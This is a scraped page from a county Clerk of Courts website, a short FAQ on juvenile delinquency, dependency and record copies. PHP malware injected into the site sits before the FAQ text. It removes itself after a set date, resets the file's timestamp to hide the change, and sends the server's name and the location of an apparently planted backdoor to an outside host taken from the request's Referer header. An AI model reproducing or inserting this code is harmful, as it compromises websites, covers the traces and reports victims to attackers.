check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Juvenile Delinquency / Dependency FAQ's
Home Juvenile Delinquency / Dependency FAQ's

More... Quick Links

Juvenile Delinquency / Dependency FAQs
  Toggle all descriptions Collapse all descriptions
Frequently Asked Questions (Click to sort)
What is juvenile delinquency?

Juvenile delinquency involves anyone under the age of 18 that has been charged with a crime.

What is juvenile dependency?

Juvenile dependency involves anyone under the age of 18 that has been determined by the
Department of Children and Families to be neglected, abandoned, or abused.

How do I find out about my child's charges?

Information regarding juveniles is confidential and cannot be discussed over the telephone.
With proper identification, parties affiliated with the case can visit the Circuit Civil Division to
review the information.

If I have a juvenile record, how can I receive a copy?

With proper identification, the Circuit Civil Division of the Clerk's Office may provide
photocopies for a fee.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.